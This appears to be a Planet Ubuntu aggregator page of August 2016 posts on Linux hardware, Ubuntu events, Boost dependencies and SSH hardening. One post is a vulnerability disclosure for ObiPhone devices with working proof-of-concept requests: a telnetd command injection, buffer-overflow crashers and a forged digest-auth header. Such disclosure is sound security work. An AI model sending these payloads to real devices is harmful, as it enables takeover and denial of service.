August 23, 2016

Razer Hardware on Linux

Aaron Honeycutt

One of the things that stopped me from moving to Ubuntu Linux full time on my desktop was the lack of support for my Razer Blackwidow Chroma. For those who do not know about it: pretty link . It is a very pretty keyboard with every key programmable to be a different color or effect. I found a super cool program on github to make it work on Ubuntu/Linux Mint, Debian and a few others maybe since the source is available here: source link

Here is what the application looks like:
polychromatic-ss1

It even has a tray applet to change the colors, and effects quickly.

on August 23, 2016 08:40 PM

Webinar: Industry 4.0 & IoT

Ubuntu Insights

Webinar 3 - CloudPlugs

We’ll be hosting our next webinar on Industry 4.0 and IoT!

This webinar will explore the convergence of Operational and Information technology as one of the key benefits of the Internet of Things; and how to use this convergence as a way to build a new generation of integrated digital supply chains which are the base of Industry 4.0.

The webinar will cover the following topics:

  • Industry 4.0 and IoT Trends
  • Higher efficiency and productivity through end to end integrated digital supply chains
  • New business opportunities for all players in the manufacturing supply chain
  • Real life examples on industrial process improvements through the use of IoT

Sign-up here

About the speaker: Jimmy Garcia-Meza is the co-founder and CEO of CloudPlugs Inc. He has over 20 years of experience running startups and large divisions in private and public U.S. multinational companies. He co-founded nubisio, Inc. a cloud storage company acquired by Bain Capital. He was CEO of FilesX, a backup software company acquired by IBM. He held various executive positions at Silicon Image (SIMG) where he was responsible for driving the world-wide adoption of HDMI. He was a venture director at Index Ventures and held several executive positions at Sun Microsystems where he has in charge of a $1.7B global line of business.

on August 23, 2016 03:38 PM

M10 Travel Light winners!

Ubuntu Insights

140_M10_TravelLight_Comp_v02_#TravelLight (3)

We had an awesome selection of entries for our #TravelLight competition!

Given that the M10 tablet can also be your laptop, saving you 1.5kg compared to the average laptop, we asked you…

What would you take with you on holiday if you had 1.5kg of extra space in your luggage?

Thank you to all those that participated, we had a laugh reading them! It wasn’t easy but we narrowed down our winners to the following:

Primary winners (Prize: M10 Tablet)

Gabriel Lucas

Andrea Souviron

Other winners (Prize: Strauss bluetooth speaker)

Adnan Quaium

Zakaria Bouzid

Bouslikhin saad

Johnny Chin

Bruce Cozine

Learn about the M10

on August 23, 2016 03:19 PM

Well, hello there, people. I am back with another Bacon Roundup which summarizes some of the various things I have published recently. Don’t forget to subscribe to get the latest posts right to your inbox.

Also, don’t forget that I am doing a Reddit AMA (Ask Me Anything) on Tues 30th August 2016 at 9am Pacific. Find out the details here.

Without further ado, the roundup:

Building a Career in Open Source (opensource.com)
A piece I wrote about how to build a successful career in open source. It delves into finding opportunity, building a network, always learning/evolving, and more. If you aspire to work in open source, be sure to check it out.

Cutting the Cord With Playstation Vue (jonobacon.org)
At home we recently severed ties with DirecTV (for lots of reasons, this being one), and moved our entertainment to a Playstation 4 and Playstation Vue for TV. Here’s how I did it, how it works, and how you can get in on the action.

Running a Hackathon for Security Hackers (jonobacon.org)
Recently I have been working with HackerOne and we recently ran a hackathon for some of the best hackers in the world to hack popular products and services for fun and profit. Here’s what happened, how it looked, and what went down.

Opening Up Data Science with data.world (jonobacon.org)
Recently I have also been working with data.world who are building a global platform and community for data, collaboration, and insights. This piece delves into the importance of data, the potential for data.world, and what the future might hold for a true data community.

From The Archive

To round out this roundup, here are a few pieces I published from the archive. As usual, you can find more here.

Using behavioral patterns to build awesome communities (opensource.com)
Human beings are pretty irrational a lot of the time, but irrational in predictable ways. These traits can provide a helpful foundation in which we build human systems and communities. This piece delves into some practical ways in which you can harness behavioral economics in your community or organization.

Atom: My New Favorite Code Editor (jonobacon.org)
Atom is an extensible text editor that provides a thin and sleek core and a raft of community-developed plugins for expanding it into the editor you want. Want it like vim? No worries. Want it like Eclipse? No worries. Here’s my piece on why it is neat and recommendations for which plugins you should install.

Ultimate unconference survival guide (opensource.com)
Unconferences, for those who are new to them, are conferences in which the attendees define the content on the fly. They provide a phenomenal way to bring fresh ideas to the surface. They can though, be a little complicated to figure out for attendees. Here’s some tips on getting the most out of them.

Stay up to date and get the latest posts direct to your email inbox with no spam and no nonsense. Click here to subscribe.

The post Bacon Roundup – 23rd August 2016 appeared first on Jono Bacon.

on August 23, 2016 01:48 PM

August 22, 2016

Ubuntu in Philadelphia

Elizabeth K. Joseph

Last week I traveled to Philadelphia to spend some time with friends and speak at FOSSCON. While I was there, I noticed a Philadelphia area Linux Users Group (PLUG) meeting would land during that week and decided to propose a talk on Ubuntu 16.04.

But first I happened to be out getting my nails done with a friend on Sunday before my talk. Since I was there, I decided to Ubuntu theme things up again. Drawing freehand, the manicurist gave me some lovely Ubuntu logos.

Girly nails aside, that’s how I ended up at The ATS Group on Monday evening for a PLUG West meeting. They had a very nice welcome sign for the group. Danita and I arrived shortly after 7PM for the Q&A portion of the meeting. This pre-presentation time gave me the opportunity to pass around my BQ Aquaris M10 tablet running Ubuntu. After the first unceremonious pass, I sent it around a second time with more of an introduction, and the Bluetooth keyboard and mouse combo so people could see convergence in action by switching between the tablet and desktop view. Unlike my previous presentations, I was traveling so I didn’t have my bag of laptops and extra tablet, so that was the extent of the demos.

The meeting was very well attended and the talk went well. It was nice to have folks chiming in on a few of the topics (like the transition to systemd) and there were good questions. I also was able to give away a copy of our The Official Ubuntu Book, 9th Edition to an attendee who was new to Ubuntu.

Keith C. Perry shared a video of the talk on G+ here. Slides are similar to past talks, but I added a couple since I was presenting on a Xubuntu system (rather than Ubuntu) and didn’t have pure Ubuntu demos available: slides (7.6M PDF, lots of screenshots).

After the meeting we all had an enjoyable time at The Office, which I hadn’t been to since moving away from Philadelphia almost seven years ago.

Thanks again to everyone who came out, it was nice to meet a few new folks and catch up with a bunch of people I haven’t seen in several years.

Saturday was FOSSCON! The Ubuntu Pennsylvania LoCo team showed up to have a booth, staffed by long time LoCo member Randy Gold.

They had Ubuntu demos, giveaways from the Ubuntu conference pack (lanyards, USB sticks, pins) and I dropped off a copy of the Ubuntu book for people to browse, along with some discount coupons for folks who wanted to buy it. My Ubuntu tablet also spent time at the table so people could play around with that.


Thanks to Randy for the booth photo!

At the conference closing, we had three Ubuntu books to raffle off! They seemed to go to people who appreciated them and since both José and I attended the conference, the raffle winners had 2/3 of the authors there to sign the books.


My co-author, José Antonio Rey, signing a copy of our book!
on August 22, 2016 07:53 PM

Note that this a duplicate of the advisory sent to the full-disclosure mailing list.

Introduction

Multiple vulnerabilities were discovered in the web management interface of the ObiHai ObiPhone products. The Vulnerabilities were discovered during a black box security assessment and therefore the vulnerability list should not be considered exhaustive.

Affected Devices and Versions

ObiPhone 1032/1062 with firmware less than 5-0-0-3497.

Vulnerability Overview

Obi-1. Memory corruption leading to free() of an attacker-controlled address
Obi-2. Command injection in WiFi Config
Obi-3. Denial of Service due to buffer overflow
Obi-4. Buffer overflow in internal socket handler
Obi-5. Cross-site request forgery
Obi-6. Failure to implement RFC 2617 correctly
Obi-7. Invalid pointer dereference due to invalid header
Obi-8. Null pointer dereference due to malicious URL
Obi-9. Denial of service due to invalid content-length

Vulnerability Details

Obi-1. Memory corruption leading to free() of an attacker-controlled address

By providing a long URI (longer than 256 bytes) not containing a slash in a request, a pointer is overwritten which is later passed to free(). By controlling the location of the pointer, this would allow an attacker to affect control flow and gain control of the application. Note that the free() seems to occur during cleanup of the request, as a 404 is returned to the user before the segmentation fault.

python -c 'print "GET " + "A"*257 + " HTTP/1.1\nHost: foo"' | nc IP 80

(gdb) bt
#0  0x479d8b18 in free () from root/lib/libc.so.6
#1  0x00135f20 in ?? ()
(gdb) x/5i $pc
=> 0x479d8b18 <free+48>:        ldr     r3, [r0, #-4]
   0x479d8b1c <free+52>:        sub     r5, r0, #8
   0x479d8b20 <free+56>:        tst     r3, #2
   0x479d8b24 <free+60>:        bne     0x479d8bec <free+260>
   0x479d8b28 <free+64>:        tst     r3, #4
(gdb) i r r0
r0             0x41     65

Obi-2. Command injection in WiFi Config

An authenticated user (including the lower-privileged “user” user) can enter a hidden network name similar to “$(/usr/sbin/telnetd &)”, which starts the telnet daemon.

GET /wifi?checkssid=$(/usr/sbin/telnetd%20&) HTTP/1.1
Host: foo
Authorization: [omitted]

Note that telnetd is now running and accessible via user “root” with no password.

Obi-3. Denial of Service due to buffer overflow

By providing a long URI (longer than 256 bytes) beginning with a slash, memory is overwritten beyond the end of mapped memory, leading to a crash. Though no exploitable behavior was observed, it is believed that memory containing information relevant to the request or control flow is likely overwritten in the process. strcpy() appears to write past the end of the stack for the current thread, but it does not appear that there are saved link registers on the stack for the devices under test.

python -c 'print "GET /" + "A"*256 + " HTTP/1.1\nHost: foo"' | nc IP 80

(gdb) bt
#0  0x479dc440 in strcpy () from root/lib/libc.so.6
#1  0x001361c0 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) x/5i $pc
=> 0x479dc440 <strcpy+16>:      strb    r3, [r1, r2]
   0x479dc444 <strcpy+20>:      bne     0x479dc438 <strcpy+8>
   0x479dc448 <strcpy+24>:      bx      lr
   0x479dc44c <strcspn>:        push    {r4, r5, r6, lr}
   0x479dc450 <strcspn+4>:      ldrb    r3, [r0]
(gdb) i r r1 r2
r1             0xb434df01       3023363841
r2             0xff     255
(gdb) p/x $r1+$r2
$1 = 0xb434e000

Obi-4. Buffer overflow in internal socket handler

Commands to be executed by realtime backend process obid are sent via Unix domain sockets from obiapp. In formatting the message for the Unix socket, a new string is constructed on the stack. This string can overflow the static buffer, leading to control of program flow. The only vectors leading to this code that were discovered during the assessment were authenticated, however unauthenticated code paths may exist. Note that the example command can be executed as the lower-privileged “user” user.

GET /wifi?checkssid=[A*1024] HTTP/1.1
Host: foo
Authorization: [omitted]

(gdb) 
#0  0x41414140 in ?? ()
#1  0x0006dc78 in ?? ()

Obi-5. Cross-site request forgery

All portions of the web interface appear to lack any protection against Cross-Site Request Forgery. Combined with the command injection vector in ObiPhone-3, this would allow a remote attacker to execute arbitrary shell commands on the phone, provided the current browser session was logged-in to the phone.

Obi-6. Failure to implement RFC 2617 correctly

RFC 2617 specifies HTTP digest authentication, but is not correctly implemented on the ObiPhone. The HTTP digest authentication fails to comply in the following ways:

  • The URI is not validated
  • The application does not verify that the nonce received is the one it sent
  • The application does not verify that the nc value does not repeat or go backwards

    GET / HTTP/1.1 Host: foo Authorization: Digest username=”admin”, realm=”a”, nonce=”a”, uri=”/”, algorithm=MD5, response=”309091eb609a937358a848ff817b231c”, opaque=””, qop=auth, nc=00000001, cnonce=”a” Connection: close

    HTTP/1.1 200 OK Server: OBi110 Cache-Control:must-revalidate, no-store, no-cache Content-Type: text/html Content-Length: 1108 Connection: close

Please note that the realm, nonce, cnonce, and nc values have all been chosen and the response generated offline.

Obi-7. Invalid pointer dereference due to invalid header

Sending an invalid HTTP Authorization header, such as “Authorization: foo”, causes the program to attempt to read from an invalid memory address, leading to a segmentation fault and reboot of the device. This requires no authentication, only access to the network to which the device is connected.

GET / HTTP/1.1
Host: foo
Authorization: foo

This causes the server to dereference the address 0xFFFFFFFF, presumably returned as a -1 error code.

(gdb) bt
#0  0x479dc438 in strcpy () from root/lib/libc.so.6
#1  0x00134ae0 in ?? ()
(gdb) x/5i $pc
=> 0x479dc438 <strcpy+8>:       ldrb    r3, [r1, #1]!
   0x479dc43c <strcpy+12>:      cmp     r3, #0
   0x479dc440 <strcpy+16>:      strb    r3, [r1, r2]
   0x479dc444 <strcpy+20>:      bne     0x479dc438 <strcpy+8>
   0x479dc448 <strcpy+24>:      bx      lr
(gdb) i r r1
r1             0xffffffff       4294967295

Obi-8. Null pointer dereference due to malicious URL

If the /obihai-xml handler is requested without any trailing slash or component, this leads to a null pointer dereference, crash, and subsequent reboot of the phone. This requires no authentication, only access to the network to which the device is connected.

GET /obihai-xml HTTP/1.1
Host: foo

(gdb) bt
#0  0x479dc7f4 in strlen () from root/lib/libc.so.6
Backtrace stopped: Cannot access memory at address 0x8f6
(gdb) info frame
Stack level 0, frame at 0xbef1aa50:
pc = 0x479dc7f4 in strlen; saved pc = 0x171830
Outermost frame: Cannot access memory at address 0x8f6
Arglist at 0xbef1aa50, args: 
Locals at 0xbef1aa50, Previous frame's sp is 0xbef1aa50
(gdb) x/5i $pc
=> 0x479dc7f4 <strlen+4>:       ldr     r2, [r1], #4
   0x479dc7f8 <strlen+8>:       ands    r3, r0, #3
   0x479dc7fc <strlen+12>:      rsb     r0, r3, #0
   0x479dc800 <strlen+16>:      beq     0x479dc818 <strlen+40>
   0x479dc804 <strlen+20>:      orr     r2, r2, #255    ; 0xff
(gdb) i r r1
r1             0x0      0

Obi-9. Denial of service due to invalid content-length

Content-Length headers of -1, -2, or -3 result in a crash and device reboot. This does not appear exploitable to gain execution. Larger (more negative) values return a page stating “Firmware Update Failed” though it does not appear any attempt to update the firmware with the posted data occurred.

POST / HTTP/1.1
Host: foo
Content-Length: -1

Foo

This appears to write a constant value of 0 to an address controlled by the Content-Length parameter, but since it appears to be relative to a freshly mapped page of memory (perhaps via mmap() or malloc()), it does not appear this can be used to gain control of the application.

(gdb) bt
#0  0x00138250 in HTTPD_msg_proc ()
#1  0x00070138 in ?? ()
(gdb) x/5i $pc
=> 0x138250 <HTTPD_msg_proc+396>:       strb    r1, [r3, r2]
  0x138254 <HTTPD_msg_proc+400>:       ldr     r1, [r4, #24]
  0x138258 <HTTPD_msg_proc+404>:       ldr     r0, [r4, #88]   ; 0x58
  0x13825c <HTTPD_msg_proc+408>:       bl      0x135a98
  0x138260 <HTTPD_msg_proc+412>:       ldr     r0, [r4, #88]   ; 0x58
(gdb) i r r3 r2
r3             0xafcc7000       2949410816
r2             0xffffffff       4294967295

Mitigation

Upgrade to Firmware 5-0-0-3497 (5.0.0 build 3497) or newer.

Author

The issues were discovered by David Tomaschik of the Google Security Team.

Timeline

  • 2016/05/12 - Reported to ObiHai
  • 2016/05/12 - Findings Acknowledged by ObiHai
  • 2016/05/20 - ObiHai reports working on patches for most issues
  • 2016/06/?? - New Firmware posted to ObiHai Website
  • 2016/08/18 - Public Disclosure
on August 22, 2016 07:00 AM

A few weeks ago, I hacked up go-wmata, some golang bindings to the WMATA API. This is super handy if you are in the DC area, and want to interface to the WMATA data.

As a proof of concept, I wrote a yo bot called @WMATA, where it returns the closest station if you Yo it your location. For hilarity, feel free to Yo it from outside DC.

For added fun, and puns, I wrote a dbus proxy for the API as weel, at wmata-dbus, so you can query the next train over dbus. One thought was to make a GNOME Shell extension to tell me when the next train is. I’d love help with this (or pointers on how to learn how to do this right).

on August 22, 2016 02:16 AM

August 21, 2016

Recently I generated diagrams showing the header dependencies between Boost libraries, or rather, between various Boost git repositories. Diagrams showing dependencies for each individual Boost git repo are here along with dot files for generating the images.

The monster diagram is here:

Edges and Incidental Modules and Packages

The directed edges in the graphs represent that a header file in one repository #includes a header file in the other repository. The idea is that, if a packager wants to package up a Boost repo, they can’t assume anything about how the user will use it. A user of Boost.ICL can choose whether ICL will use Boost.Container or not by manipulating the ICL_USE_BOOST_MOVE_IMPLEMENTATION preprocessor macro. So, the packager has to list Boost.Container as some kind of dependency of Boost.ICL, so that when the package manager downloads the boost-icl package, the boost-container package is automatically downloaded too. The dependency relationship might be a ‘suggests’ or ‘recommends’, but the edge will nonetheless exist somehow.

In practice, packagers do not split Boost into packages like that. At least for debian packages they split compiled static libraries into packages such as libboost-serialization1.58, and put all the headers (all header-only libraries) into a single package libboost1.58-dev. Perhaps the reason for packagers putting it all together is that there is little value in splitting the header-only repository content in the monolithic Boost from each other if it will all be packaged anyway. Or perhaps the sheer number of repositories makes splitting impractical. This is in contrast to KDE Frameworks, which does consider such edges and dependency graph size when determining where functionality belongs. Typically KDE aims to define the core functionality of a library on its own in a loosely coupled way with few dependencies, and then add integration and extension for other types in higher level libraries (if at all).

Another feature of my diagrams is that repositories which depend circularly on each other are grouped together in what I called ‘incidental modules‘. The name is inspired by ‘incidental data structures’ which Sean Parent describes in detail in one of his ‘Better Code’ talks. From a packager point of view, the Boost.MPL repo and the Boost.Utility repo are indivisible because at least one header of each repo includes at least one header of the other. That is, even if packagers wanted to split Boost headers in some way, the ‘incidental modules’ would still have to be grouped together into larger packages.

As far as I am aware such circular dependencies don’t fit with Standard C++ Modules designs or the design of Clang Modules, but that part of C++ would have to become more widespread before Boost would consider their impact. There may be no reason to attempt to break these ‘incidental modules’ apart if all that would do is make some graphs nicer, and it wouldn’t affect how Boost is packaged.

My script for generating the dependency information is simply grepping through the include/ directory of each repository and recording the #included files in other repositories. This means that while we know Boost.Hana can be used stand-alone, if a packager simply packages up the include/boost/hana directory, the result will have dependencies on parts of Boost because Hana includes code for integration with existing Boost code.

Dependency Analysis and Reduction

One way of defining a Boost library is to consider the group of headers which are gathered together and documented together to be a library (there are other ways which some in Boost prefer – it is surprisingly fuzzy). That is useful for documentation at least, but as evidenced it appears to not be useful from a packaging point of view. So, are these diagrams useful for anything?

While Boost header-only libraries are not generally split in standard packaging systems, the bcp tool is provided to allow users to extract a subset of the entire Boost distribution into a user-specified location. As far as I know, the tool scans header files for #include directives (ignoring ifdefs, like a packager would) and gathers together all of the transitively required files. That means that these diagrams are a good measure of how much stuff the bcp tool will extract.

Note also that these edges do not contribute time to your slow build – reducing edges in the graphs by moving files won’t make anything faster. Rewriting the implementation of certain things might, but that is not what we are talking about here.

I can run the tool to generate a usable Boost.ICL which I can easily distribute. I delete the docs, examples and tests from the ICL directory because they make up a large chunk of the size. Such a ‘subset distribution’ doesn’t need any of those. I also remove 3.5M of preprocessed files from MPL. I then need to define BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS when compiling, which is easy and explained at the end:

$ bcp --boost=$HOME/dev/src/boost icl myicl
$ rm -rf boostdir/libs/icl/{doc,test,example}
$ rm -rf boostdir/boost/mpl/aux_/preprocessed
$ du -hs myicl/
15M     myicl/

Ok, so it’s pretty big. Looking at the dependency diagram for Boost.ICL you can see an arrow to the ‘incidental spirit’ module. Looking at the Boost.Spirit dependency diagram you can see that it is quite large.

Why does ICL depend on ‘incidental spirit’? Can that dependency be removed?

For those ‘incidental modules’, I selected one of the repositories within the group and named the group after that one repository. Too see why ICL depends on ‘incidental spirit’, we have to examine all 5 of the repositories in the group to check if it is the one responsible for the dependency edge.

boost/libs/icl$ git grep -Pl -e include --and \
  -e "thread|spirit|pool|serial|date_time" include/
include/boost/icl/gregorian.hpp
include/boost/icl/ptime.hpp

Formatting wide terminal output is tricky in a blog post, so I had to make some compromises in the output here. Those ICL headers are including Boost.DateTime headers.

I can further see that gregorian.hpp and ptime.hpp are ‘leaf’ files in this analysis. Other files in ICL do not include them.

boost/libs/icl$ git grep -l gregorian include/
include/boost/icl/gregorian.hpp
boost/libs/icl$ git grep -l ptime include/
include/boost/icl/ptime.hpp

As it happens, my ICL-using code also does not need those files. I’m only using icl::interval_set<double> and icl::interval_map<double>. So, I can simply delete those files.

boost/libs/icl$ git grep -l -e include \
  --and -e date_time include/boost/icl/ | xargs rm
boost/libs/icl$

and run the bcp tool again.

$ bcp --boost=$HOME/dev/src/boost icl myicl
$ rm -rf myicl/libs/icl/{doc,test,example}
$ rm -rf myicl/boost/mpl/aux_/preprocessed
$ du -hs myicl/
12M     myicl/

I’ve saved 3M just by understanding the dependencies a bit. Not bad!

Mostly the size difference is accounted for by no longer extracting boost::mpl::vector, and secondly the Boost.DateTime headers themselves.

The dependencies in the graph are now so few that we can consider them and wonder why they are there and can they be removed. For example, there is a dependency on the Boost.Container repository. Why is that?

include/boost/icl$ git grep -C2 -e include \
   --and -e boost/container
#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <set>
--

#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/map.hpp>
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <map>
--

#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <set>

So, Boost.Container is only included if the user defines ICL_USE_BOOST_MOVE_IMPLEMENTATION, and otherwise not. If we were talking about C++ code here we might consider this a violation of the Interface Segregation Principle, but we are not, and unfortunately the realities of the preprocessor mean this kind of thing is quite common.

I know that I’m not defining that and I don’t need Boost.Container, so I can hack the code to remove those includes, eg:

index 6f3c851..cf22b91 100644
--- a/include/boost/icl/map.hpp
+++ b/include/boost/icl/map.hpp
@@ -12,12 +12,4 @@ Copyright (c) 2007-2011:
 
-#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
-#   include <boost/container/map.hpp>
-#   include <boost/container/set.hpp>
-#elif defined(ICL_USE_STD_IMPLEMENTATION)
 #   include <map>
 #   include <set>
-#else // Default for implementing containers
-#   include <map>
-#   include <set>
-#endif

This and following steps don’t affect the filesystem size of the result. However, we can continue to analyze the dependency graph.

I can break apart the ‘incidental fusion’ module by deleting the iterator/zip_iterator.hpp file, removing further dependencies in my custom Boost.ICL distribution. I can also delete the iterator/function_input_iterator.hpp file to remove the dependency on Boost.FunctionTypes. The result is a graph which you can at least reason about being used in an interval tree library like Boost.ICL, quite apart from our starting point with that library.

You might shudder at the thought of deleting zip_iterator if it is an essential tool to you. Partly I want to explore in this blog post what will be needed from Boost in the future when we have zip views from the Ranges TS or use the existing ranges-v3 directly, for example. In that context, zip_iterator can go.

Another feature of the bcp tool is that it can scan a set of source files and copy only the Boost headers that are included transitively. If I had used that, I wouldn’t need to delete the ptime.hpp or gregorian.hpp etc because bcp wouldn’t find them in the first place. It would still find the Boost.Container etc includes which appear in the ICL repository however.

In this blog post, I showed an alternative approach to the bcp --scan attempt at minimalism. My attempt is to use bcp to export useful and as-complete-as-possible libraries. I don’t have a lot of experience with bcp, but it seems that in scanning mode I would have to re-run the tool any time I used an ICL header which I had not used before. With the modular approach, it would be less-frequently necessary to run the tool (only when directly using a Boost repository I hadn’t used before), so it seemed an approach worth exploring the limitations of.

Examining Proposed Standard Libraries

We can also examine other Boost repositories, particularly those which are being standardized by newer C++ standards because we know that any, variant and filesystem can be implemented with only standard C++ features and without Boost.

Looking at Boost.Variant, it seems that use of the Boost.Math library makes that graph much larger. If we want Boost.Variant without all of that Math stuff, one thing we can choose to do is copy the one math function that Variant uses, static_lcm, into the Variant library (or somewhere like Boost.Core or Boost.Integer for example). That does cause a significant reduction in the dependency graph.

Further, I can remove the hash_variant.hpp file to remove the Boost.Functional dependency:

I don’t know if C++ standardized variant has similar hashing functionality or how it is implemented, but it is interesting to me how it affects the graph.

Using a bcp-extracted library with Modern CMake

After extracting a library or set of libraries with bcp, you might want to use the code in a CMake project. Here is the modern way to do that:

add_library(boost_mpl INTERFACE)
target_compile_definitions(boost_mpl INTERFACE
    BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS
)
target_include_directories(boost_mpl INTERFACE 
    "${CMAKE_CURRENT_SOURCE_DIR}/myicl"
)

add_library(boost_icl INTERFACE)
target_link_libraries(boost_icl INTERFACE boost_mpl)
target_include_directories(boost_icl INTERFACE 
    "${CMAKE_CURRENT_SOURCE_DIR}/myicl/libs/icl/include"
)
add_library(boost::icl ALIAS boost_icl)
#

Boost ships a large chunk of preprocessed headers for various compilers, which I mentioned above. The reasons for that are probably historical and obsolete, but they will remain and they are used by default when using GCC and that will not change. To diverge from that default it is necessary to set the BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS preprocessor macro.

By defining an INTERFACE boost_mpl library and setting its INTERFACE target_compile_definitions, any user of that library gets that magic BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS define when compiling its sources.

MPL is just an internal implementation detail of ICL though, so I won’t have any of my CMake targets using MPL directly. Instead I additionally define a boost_icl INTERFACE library which specifies an INTERFACE dependency on boost_mpl with target_link_libraries.

The last ‘modern’ step is to define an ALIAS library. The alias name is boost::icl and it aliases the boost_icl library. To CMake, the following two commands generate an equivalent buildsystem:

target_link_libraries(myexe boost_icl)
target_link_libraries(myexe boost::icl)
#

Using the ALIAS version has a different effect however: If the boost::icl target does not exist an error will be issued at CMake time. That is not the case with the boost_icl version. It makes sense to use target_link_libraries with targets with :: in the name and ALIAS makes that possible for any library.


on August 21, 2016 08:48 PM

Si eres una persona que te gusta utilizar WordPress y te llega a salir este pequeño detalle (Abort Class-pclzip.php : Missing Zlib) cuando estás importante un Slider de Revolution Slider, no te preocupes, la solución es la siguiente:

  1. Debes editar el archivo que se encuentra dentro de la carpeta wp-admin/includes/: sudo nano /carpetadondeseencuentresusitio/wp-admin/includes/class-pclzip.php
  2. Encontrar la linea if (!function_exists(‘gzopen’)) y reemplazar gzopen por gzopen64.

Con ese pequeño cambio podrás seguir utilizando sin ningún problema el plugin.

Ahora, ¿Porqué da ese error?, en las últimas versiones de Ubuntu gzopen (función de PHP que nos permite abrir un archivo comprimido en .gz), solo está incluido para arquitectura de 64bits, es por esta razón que es necesario reemplazar gzopen por gzopen64 para que podamos importar todos esos archivos que se encuentran comprimido a través de este tipo de formato.

Happy Hacking!


on August 21, 2016 05:37 PM

Help a friend?

Valorie Zimmerman

Hello, if you are reading this, and have a some extra money, consider helping out a young friend of mine whose mother needs a better defense attorney.

In India, where they live, the resources all seem stacked against her. I've tried to help, and hope you will too.

Himanshu says, Hi, I recently started an online crowd funding campaign to help my mother with legal funds who is in the middle of divorce and domestic violence case.

 https://www.ketto.org/mother

Please support and share this message. Thanks.
on August 21, 2016 07:55 AM

I was setting up some wargame boxes for a private group and wanted to reduce the risk of malfeasence/abuse from these boxes. One option, used by many public wargames, is locking down the firewall. While that’s a great start, I decided to go one step further and prevent directly logging in as the wargame users, requiring that the users of my private wargames have their own accounts.

Step 1: Setup the Private Accounts

This is pretty straightforward: create a group for these users that can SSH directly in, create their accounts, and setup their public keys.

# groupadd sshusers
# useradd -G sshusers matir
# su - matir
$ mkdir -p .ssh
$ echo 'AAA...' > .ssh/authorized_keys

Step 2: Configure PAM

This will setup PAM to define who can log in from where. Edit /etc/security/access.conf to look like this:

# /etc/security/access.conf
+ : (sshusers) : ALL
+ : ALL : 127.0.0.0/24
- : ALL : ALL

This allows sshusers to log in from anywhere, and everyone to log in locally. This way, users allowed via SSH log in, then port forward from their machine to the wargame server to connect as a level.

Edit /etc/pam.d/sshd to use this by uncommenting (or adding) a line:

account  required     pam_access.so nodefgroup

Step 3: Configure SSHD

Now we’ll configure SSHD to allow access as needed: passwords locally, keys only from remote hosts, and make sure we use pam. Ensure the following settings are set:

UsePAM yes

Match Host !127.0.0.0/24
  PasswordAuthentication no

Step 4: Test

Restart sshd and you should be able to connect remotely as any user in sshusers, but not any other user. You should also be able to port forward and check then connect with a username/password through the forwarded port.

on August 21, 2016 07:00 AM

August 18, 2016



Thanks to the Ubuntu Community Fund, I'm able to fly to Berlin and attend, and volunteer too. Thanks so much, Ubuntu community for backing me, and to the KDE e.V. and KDE community for creating and running Akademy.

This year, Akademy is part of Qtcon, which should be exciting. Lots of our friends will be there, from KDAB, VLC, Qt and FSFE. And of course Kubuntu will do our annual face-to-face meeting, with as many of us as can get to Berlin. It should be hot, exhausting, exciting, fun, and hard work, all rolled together in one of the world's great cities.

Today we got the news that Canonical has become a KDE e.V. Patron. This is most welcome news, as the better the cooperation between distributions and KDE, the better software we all have. This comes soon after SuSE's continuing support was affirmed on the growing list of Patrons.

Freedom and generosity is what it's all about!
on August 18, 2016 11:17 PM

I’ve made some changes to the Plasma 5.8 release schedule.  We had a request from our friends at openSUSE to bring the release sooner by a couple of weeks so they could sneak it into their release and everyone could enjoy the LTS goodness.  As openSUSE are long term supporters and contributors to KDE as well as patrons of KDE the Plasma team chatted and decided to slide the dates around to help out.  Release is now on the first Tuesday in October.

 

Facebooktwittergoogle_pluslinkedinby feather
on August 18, 2016 09:14 PM

Akademy is this year at QtCon along with FSF-E, Qt, VLC and others.

I booked a flat on AirBNB near to the Akademy location and there’s still a bed or two left available.

Wed Aug 31 CHECK IN 2:00 PM

Thu Sep 08 CHECK OUT 11:00 AM

Cost: £360 each, about €420 each

If you’d like to star with cool KDE people in a (gentle) party flat send me an e-mail.



Facebooktwittergoogle_pluslinkedinby feather
on August 18, 2016 03:17 PM

Earlier this year when I was in Austin, my friend Andy Sernovitz introduced me to a new startup called data.world.

What caught my interest is that they are building a platform to make data science and discovery easier, more accessible, and more collaborative. I love these kinds of big juicy challenges!

Recently I signed them up as a client to help them build their community, and I want to share a few words about why I think they are important, not just for data science fans, but from a wider scientific discovery perspective.

Screen Shot 2016-08-15 at 3.35.31 AM

Armchair Discovery

Data plays a critical role in the world. Buried in rows and rows of seemingly flat content are patterns, trends, and discoveries that can help us to learn, explore new ideas, and work more effectively.

The work that leads to these discoveries is often bringing together different data sets to explore and reach new conclusions. As an example, traffic accident data for a single town is interesting, but when we combine it with data sets for national/international traffic accidents, insurance claims, drink driving, and more, we can often find patterns that can help us to influence and encourage new behavior and technology.

Screen Shot 2016-08-15 at 3.36.10 AM

Many of these discoveries are hiding in plain sight. Sadly, while talented data scientists are able to pull together these different data sets, it is often hard and laborious work. Surely if we make this work easier, more accessible, consistent, and available to all we can speed up innovation and discovery?

Exactly.

As history has taught us, the right mixture of access, tooling, and community can have a tremendous impact. We have seen examples of this in open source (e.g. GitLab / GitHub), funding (e.g. Kickstarter / Indiegogo), and security (e.g. HackerOne).

data.world are doing this for data.

Data Science is Tough

There are four key areas where I think data.world can make a potent impact:

  1. Access – while there is lots of data in the world, access is inconsistent. Data is often spread across different sites, formats, and accessible to different people. We can bring this data together into a consistent platform, available to everyone.
  2. Preparation – much of the work data scientists perform is learning and prepping datasets for use. This work should be simplified, done once, and then shared with everyone, as opposed to being performed by each person who consumes the data.
  3. Collaboration – a lot of data science is fairly ad-hoc in how people work together. In much the same way open source has helped create common approaches for code, there is potential to do the same with data.
  4. Community – there is a great opportunity to build a diverse global community, not just of data scientists, but also organizations, charities, activists, and armchair sleuths who, armed with the right tools and expertise, could make many meaningful discoveries.
